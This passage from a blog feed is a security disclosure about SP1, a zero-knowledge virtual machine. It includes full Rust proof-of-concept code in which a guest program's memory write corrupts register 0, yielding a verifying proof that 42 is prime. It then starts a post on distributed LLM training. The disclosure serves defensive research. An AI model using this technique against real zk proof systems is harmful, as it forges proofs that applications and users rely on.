&lt;p&gt;&lt;strong&gt;TL;DR&lt;&#x2F;strong&gt;: We found a subtle bug in Succinct’s SP1 virtual machine that allows a malicious user to prove the validity of false statements by manipulating register 0 in the guest code.&lt;&#x2F;p&gt;
&lt;p&gt;This was found thanks to a collaboration between &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.3milabs.tech&#x2F;&quot;&gt;3MI Labs&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.alignedlayer.com&#x2F;&quot;&gt;Aligned&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;LambdaClass and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;fuzzinglabs.com&#x2F;&quot;&gt;Fuzzing Labs&lt;&#x2F;a&gt; will invest in further investigating critical security bugs in zkVMs. We believe codebases have become too complex and over-engineered, and this gives rise to many bugs. The industry is at risk if we do not invest in security, add more eyes, and simplify codebases. It has become complacent about security and is being pushed by business decisions to rush into production, leaving these issues aside, which could have very serious consequences. In this post, we analyze the case of SP1, but we think all zkVM codebases need to be simplified and follow the standards, lowering the attack surface. As mentioned, we will conduct more thorough research on different zkVMs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;We have seen the development of long and complex codebases in several engineering projects, with too many features and poor documentation and testing. Some people believe that having such codebases shows that you are smart, have excellent coding skills, and have given a lot of thought to everything. We think otherwise: the proof of mastery lies in simplicity. Bugs will always happen in any project, but the chance of having critical bugs increases with codebase complexity and length in a nonlinear way: the longer and more complex, the more bugs and hard-to-predict behaviors you can have.&lt;&#x2F;p&gt;
&lt;p&gt;During our analysis of zk virtual machines and proof systems, we found a bug in Succinct’s SP1 virtual machine, which allows a malicious actor to generate a valid proof of malicious programs (proving that a false statement is true). We disclosed our concerns to Succinct’s team, and they replied that this was &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;jtguibas&#x2F;status&#x2F;1862301417870148082&quot;&gt;within their security assumptions&lt;&#x2F;a&gt; and is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;succinctlabs&#x2F;sp1&#x2F;blob&#x2F;dev&#x2F;book&#x2F;docs&#x2F;developers&#x2F;rv32im-deviations.md&quot;&gt;currently included in their documentation&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;We discussed these issues with several auditors and concluded that the most important thing is that this deviation was well-documented and communicated, so we’re updating our docs to reflect that. We do not believe this is a security concern since programs proven in our zkVM are already assumed to be well-formed and not malicious. In other words, while you can prove the execution of the malicious program, the resulting proof is meaningless if the program is corrupt.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;We like Succinct’s work and think their virtual machine has sparked a lot of good competition to improve current zkvm designs and helped show that the future of ZK is in RISC-V virtual machines. We have been playing and experimenting with it a lot and are considering using it in some of our projects. We also liked that they responded fast to our findings, and although we disagreed with their criteria, they took our concerns seriously.&lt;&#x2F;p&gt;
&lt;p&gt;From our point of view, this bug arises from a departure from the RISC-V spec and the complexity of the codebase. More care needs to be taken when designing, developing, and testing zk virtual machines that could be used in real-world applications, and the attack surface should be minimized by not venturing into uncharted territory.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;description-of-the-bug&quot;&gt;Description of the bug&lt;&#x2F;h2&gt;
&lt;p&gt;This example shows that an SP1 proof can be glitched with an appropriately targeted memory write. We will use this to prove that 42 is prime using a simple primality test:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Checks divisibility by 2 and 3 directly, then by numbers of the form 6k ± 1.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Source: https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Primality_test#Rust&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn is_prime(n: u64) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if n &amp;lt;= 1 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return false;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if n &amp;lt;= 3 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return true;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if n % 2 == 0 || n % 3 == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return false;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut i = 5;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    while i * i &amp;lt;= n {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if n % i == 0 || n % (i + 2) == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            return false;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        i += 6;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    true&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using the following guest program (using i&#x2F;o is unnecessary for the bug):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let what: u8 = sp1_zkvm::io::read();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let where_: u32 = sp1_zkvm::io::read();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n = sp1_zkvm::io::read::&amp;lt;u64&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We can have a little write, as a treat&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    unsafe {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *(where_ as *mut u8) = what;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let is_prime = is_prime(n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sp1_zkvm::io::commit(&amp;amp;n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sp1_zkvm::io::commit(&amp;amp;is_prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then the proving script is executed:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;! A program that takes a number `n` as input and writes if `n` is prime as an output.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use sp1_sdk::{utils, ProverClient, SP1Stdin};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; in the program directory&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const ELF: &amp;amp;[u8] = include_bytes!(&amp;quot;..&#x2F;..&#x2F;..&#x2F;program&#x2F;elf&#x2F;is-prime-write&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const FILENAME: &amp;amp;&amp;#39;static str = &amp;quot;is-prime-write.proof&amp;quot;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Setup a tracer for logging.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    utils::setup_logger();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Generate and verify the proof&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let client = ProverClient::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (pk, vk) = client.setup(ELF);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Create an input stream and write &amp;#39;42&amp;#39; to it&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n = 42u64;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut stdin = SP1Stdin::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    stdin.write(&amp;amp;1u8); &#x2F;&#x2F; what&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    stdin.write(&amp;amp;0u32); &#x2F;&#x2F; where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    stdin.write(&amp;amp;n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut proof = client.prove(&amp;amp;pk, stdin).compressed().run().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _ = proof.public_values.read::&amp;lt;u64&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let is_prime = proof.public_values.read::&amp;lt;bool&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;Is {n} prime? {}&amp;quot;, is_prime);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    client.verify(&amp;amp;proof, &amp;amp;vk).expect(&amp;quot;verification failed&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof.save(FILENAME).expect(&amp;quot;saving proof failed&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This program reads three inputs: the content of the memory write (what), the target address of the memory write (where), and a number for primality testing. (It also contains the ELF compiled version as program&#x2F;elf&#x2F;is-prime-write.). Register 0 should always be zero and cannot be changed, according to the RISC-V spec. Due to the bug, we can change it from the guest code, making statements that should be false appear to be true.&lt;&#x2F;p&gt;
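&lt;p&gt;To make the violated invariant concrete, here is a minimal sketch of our own (illustrative Python, not SP1 code) of a register file that enforces the RISC-V rule that register 0 is hardwired to zero, so writes to it are discarded:&lt;&#x2F;p&gt;

```python
# Sketch of a spec-compliant RISC-V integer register file (illustration only).
class RegisterFile:
    def __init__(self):
        self.regs = [0] * 32  # x0..x31

    def write(self, index, value):
        # Per the RISC-V spec, writes targeting x0 are silently discarded.
        if index != 0:
            self.regs[index] = value

    def read(self, index):
        return self.regs[index]

rf = RegisterFile()
rf.write(0, 42)         # attempt to corrupt x0
assert rf.read(0) == 0  # spec-compliant behavior: x0 still reads as zero
rf.write(5, 7)
assert rf.read(5) == 7
```

&lt;p&gt;An implementation that skips this check lets a write like the one in the guest program above change what register 0 reads as, breaking every instruction that relies on it being zero.&lt;&#x2F;p&gt;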
&lt;p&gt;After performing the memory write of the given content at the given address, the program tests whether the given input &lt;code&gt;n&lt;&#x2F;code&gt; is a prime number. The &lt;code&gt;is_prime()&lt;&#x2F;code&gt; function in &lt;code&gt;program&#x2F;src&#x2F;main.rs&lt;&#x2F;code&gt; is a correct primality test that should return &lt;code&gt;false&lt;&#x2F;code&gt; on input &lt;code&gt;42&lt;&#x2F;code&gt;. The program finally commits to the input &lt;code&gt;n&lt;&#x2F;code&gt; it was given, as well as the result of the primality test; these are the public values displayed by the verifier binary, showing that &lt;code&gt;is_prime()&lt;&#x2F;code&gt; incorrectly returned &lt;code&gt;true&lt;&#x2F;code&gt; when the program’s input was &lt;code&gt;42&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;script&lt;&#x2F;code&gt; directory contains the minimal Rust binary &lt;code&gt;script&#x2F;src&#x2F;bin&#x2F;verifier.rs&lt;&#x2F;code&gt;, which verifies that the proof given in &lt;code&gt;script&#x2F;is-prime-write.proof&lt;&#x2F;code&gt; declares that 42 is a prime number. This can be checked by running the following commands:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cd script&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cargo run&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;! A program that takes a number `n` as input and writes if `n` is prime as an output.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use sp1_sdk::{utils, ProverClient, SP1ProofWithPublicValues};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; in the program directory&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const ELF: &amp;amp;[u8] = include_bytes!(&amp;quot;..&#x2F;..&#x2F;..&#x2F;program&#x2F;elf&#x2F;is-prime-write&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;const FILENAME: &amp;amp;&amp;#39;static str = &amp;quot;is-prime-write.proof&amp;quot;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Setup a tracer for logging.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    utils::setup_logger();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Generate and verify the proof&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let client = ProverClient::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (_, vk) = client.setup(ELF);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Verifier code&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut deserialized_proof =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        SP1ProofWithPublicValues::load(FILENAME).expect(&amp;quot;loading proof failed&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Verify the deserialized proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    client&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .verify(&amp;amp;deserialized_proof, &amp;amp;vk)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .expect(&amp;quot;verification failed&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Now that it&amp;#39;s accepted&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n: u64 = deserialized_proof.public_values.read();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let is_prime: bool = deserialized_proof.public_values.read();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;Verifier: Is {n} prime? {is_prime}&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;While this example is naïve (since 42 is obviously not prime, being even), this idea could be exploited for more subtle attacks, including supply chain attacks. While the change in the guest program is pretty obvious in this case, in codebases that are more complex and have multiple dependencies it can be much harder to detect.&lt;br &#x2F;&gt;
The assumption that programs are always correctly generated and do not have bugs is against common sense in the software industry and could result in serious vulnerabilities. Moreover, departing from well-established standards makes the reasoning over expected behavior difficult and can lead to more complex and subtle bugs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Working with 3MI Labs and Aligned, we found a bug in how SP1 handles register 0, which can allow an attacker to prove a false statement. This results from a departure from the RISC-V spec and a complex codebase, which makes reasoning about expected behavior very difficult and can give rise to unexpected and subtle bugs with critical consequences in real-world settings. We must continue testing, analyzing, and trying to find bugs and unexpected behaviors in zk virtual machines to minimize the risks of real-world use.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Introducing DeMo: Decoupled Momentum Optimization for efficient distributed LLM training</title>
          <pubDate>Fri, 06 Dec 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/introducing-demo-decoupled-momentum-optimization-for-efficient-distributed-llm-training/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/introducing-demo-decoupled-momentum-optimization-for-efficient-distributed-llm-training/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/introducing-demo-decoupled-momentum-optimization-for-efficient-distributed-llm-training/">&lt;h2 id=&quot;tl-dr&quot;&gt;TL;DR&lt;&#x2F;h2&gt;
&lt;p&gt;Training Large Language Models (LLMs) with billions of parameters is computationally intensive and requires heavy communication inside specialized data centers. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;nousresearch.com&#x2F;&quot;&gt;Nous Research&lt;&#x2F;a&gt; released DeMo, showing how to reduce these communication costs by orders of magnitude, lowering training costs and enabling training over slower connections and on less expensive hardware. This post introduces the basic concepts and discusses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2411.19870&quot;&gt;the paper&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The problem of machine learning consists of finding a function (or mapping) from a set of inputs, $X$, to a set of outputs, $Y$. This relationship can be quite complex, and we want to approximate it using information from samples $(x , y)$. For example, we could be interested in how the length of a hanging spring responds to added weight; to that end, we would measure the weight we are adding, $w$, and record the variation in length, $\Delta x$. Another example could be correlating a person’s energy expenditure with information such as heart rate, weight, height, and amount of skeletal muscle mass. We could also want to train an agent to recognize an image. While the underlying relationships and objectives can be very different, they can all be treated with a few families of mathematical methods. Before diving into the specifics of large language models (LLMs) and artificial intelligence (AI), let us focus on simpler problems, such as measuring the spring’s elongation under weight or the current circulating in a wire due to an applied voltage.&lt;&#x2F;p&gt;
&lt;p&gt;In the case of the spring, we get some weights (for example, 25 g, 50 g, 100 g, 200 g). We measure the resulting elongation once the spring stops moving, say 1, 2, 4 and 8 cm. From empirical knowledge in physics, as long as we are in the elastic regime, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Hooke%27s_law&quot;&gt;Hooke’s law&lt;&#x2F;a&gt; holds: the weight (applied force) is proportional to the elongation, $k \Delta x = w$, where $k$ is the stiffness of the spring. The relationship does not always hold: if we add too much weight, the spring deforms permanently and no longer behaves this way. The problem we want to solve is, therefore:&lt;&#x2F;p&gt;
&lt;p&gt;Find $k$ such that $k \Delta x_i = w_i$ for $i = 0, 1, 2, … n$. This is a system of linear equations, and should there be no measurement errors and this relationship be the true mapping, then $k = w_i &#x2F; \Delta x_i$.&lt;&#x2F;p&gt;
&lt;p&gt;Some problems we face are:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The relation&#x2F;mapping we are using may be an approximation of the true relationship.&lt;&#x2F;li&gt;
&lt;li&gt;There are errors associated with the measurements (we can assume for the time being that these errors are random and not introduced systematically by the observer).&lt;&#x2F;li&gt;
&lt;li&gt;We do not have lots of measurements $(\Delta x , w)$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;This makes things quite a bit harder. To start with, the system of equations $k \Delta x_j = w_j$ may no longer have a solution. For example, we could have $(1 , 25)$ and $(2.01 , 49.9)$, which translates to:&lt;br &#x2F;&gt;
$k \cdot 1 = 25$&lt;br &#x2F;&gt;
$k \cdot 2.01 = 49.9$&lt;br &#x2F;&gt;
The first equation yields $k = 25$, while the second gives $k = 24.82$. This system of equations has no solution, but we could still be interested in estimating $k$ from the information available (the two values are not too far apart, so maybe we can do something). We could define a new function that measures the difference between the observed output $w_j$ and the predicted output $\hat{w}_j = k \Delta x_j$. We call this function the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Loss_function&quot;&gt;loss function&lt;&#x2F;a&gt;. For example,&lt;br &#x2F;&gt;
$L(k) = (k \Delta x_0 - w_0 )^2 + (k \Delta x_1 - w_1 )^2 = (\hat{w}_0 - w_0 )^2 + (\hat{w}_1 - w_1 )^2$&lt;&#x2F;p&gt;
&lt;p&gt;The function measures the quadratic error between the weight predicted by Hooke’s law and our measurements. Our objective is to find $k$ such that the loss function is minimal,&lt;br &#x2F;&gt;
$\min_{k \in K} L(k)$&lt;&#x2F;p&gt;
&lt;p&gt;Calculus tells us that the function (assuming it is “nice”) attains an extremal value if the derivative with respect to $k$ is zero,&lt;br &#x2F;&gt;
$dL&#x2F;dk = 0$&lt;&#x2F;p&gt;
&lt;p&gt;Using the chain rule for derivatives,&lt;br &#x2F;&gt;
$dL&#x2F;dk = 2(k \Delta x_0 - w_0 )\Delta x_0 + 2(k \Delta x_1 - w_1 ) \Delta x_1 = 0$&lt;&#x2F;p&gt;
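&lt;p&gt;Solving $dL&#x2F;dk = 0$ gives the closed-form least-squares estimate $k = \sum_j \Delta x_j w_j &#x2F; \sum_j \Delta x_j^2$. A minimal Rust sketch of this estimate (the function name and data layout are our illustrative choices):&lt;&#x2F;p&gt;

```rust
// Least-squares estimate of Hooke's constant k from measurements (Δx_j, w_j).
// Setting dL/dk = Σ 2(k·Δx_j - w_j)·Δx_j = 0 and solving for k yields
// k = Σ Δx_j·w_j / Σ Δx_j².
fn estimate_k(dx: &[f64], w: &[f64]) -> f64 {
    let num: f64 = dx.iter().zip(w).map(|(x, y)| x * y).sum();
    let den: f64 = dx.iter().map(|x| x * x).sum();
    num / den
}
```

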